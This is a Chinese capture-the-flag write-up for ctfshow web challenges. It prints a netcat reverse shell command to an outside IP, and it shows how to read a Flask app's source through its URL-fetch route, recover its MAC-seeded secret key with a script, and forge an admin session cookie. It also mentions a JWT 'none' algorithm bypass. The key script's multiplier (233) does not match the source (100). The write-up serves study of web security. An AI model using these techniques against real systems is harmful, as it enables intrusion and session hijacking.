ctfshow___Web应用安全与防护

第一章

第二章

反弹shell构造

使用nc反弹shell:
nc -e /bin/sh 20.18.226.90 4444
然后在本地监听4444端口:
nc -lvp 4444

第三章

Flask_Session伪造

进去之后read路由有文件包含,尝试读取了源码/app/app.py.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

# encoding:utf-8
import re, random, uuid, urllib.request
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*100)
print(app.config['SECRET_KEY'])
app.debug = False

@app.route('/')
def index():
    session['username'] = 'guest'
    return 'CTFshow 网页爬虫系统 <a href="/read?url=https://baidu.com">读取网页</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        if re.findall('flag', url, re.IGNORECASE):
            return '禁止访问'
        res = urllib.request.urlopen(url)
        return res.read().decode('utf-8', errors='ignore')
    except Exception as ex:
        print(str(ex))
    return '无读取内容可以展示'

@app.route('/flag')
def flag():
    if session.get('username') == 'admin':
        return open('/flag.txt', encoding='utf-8').read()
    else:
        return '访问受限'

if __name__=='__main__':
    app.run(
        debug=False,
        host="0.0.0.0"
    )

发现SECRET_KEY有用到random库,应该是伪随机固定数值。
uuid.getnode()用于获取当前机器的MAC地址,作为随机数种子的一部分。

1
2
3
4
5
uuid.getnode()

获取硬件的地址并以48位二进制长度的正整数形式返回,这里所说的硬件地址是指网络接口的MAC
地址,如果一个机器有多个网络接口,可能返回其中的任一个。如果获取失败,将按照RFC 4122的规定
将随机返回的48位二进制整数的第8位设置成1

读取/sys/class/net/eth0/address 获得mac地址,然后脚本处理一下:

1
2
3
4
5
6
7
8
9
10
11
12
import random

mac = "c6:bc:6b:39:0a:98"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*233)
print(randStr)

之后用得到的私钥伪造session:

1
2
3
4
5
E:\myCTFTools\WebTools\flask-session-cookie-manager-master>python flask_session_cookie_manager3.py decode -c eyJ1c2VybmFtZSI6Imd1ZXN0In0.aLcPtA.hTVLWpwcdv41tb8x22PNx89NEE4
b'{"username":"guest"}'

E:\myCTFTools\WebTools\flask-session-cookie-manager-master>python flask_session_cookie_manager3.py encode -t "{'username':'admin'}" -s "7.028160380236292"
eyJ1c2VybmFtZSI6ImFkbWluIn0.aLcYIg.unDeF5MceMaqC8PwOr9qsWEG0Es

最后访问/flag路由,成功获取flag。
20250903002926

弱口令爆破

用提供的字典爆破就行。

JWT令牌伪造

根据提示,考的是none空加密算法。
直接在线修改为none,然后admin修改为true即可。

第四章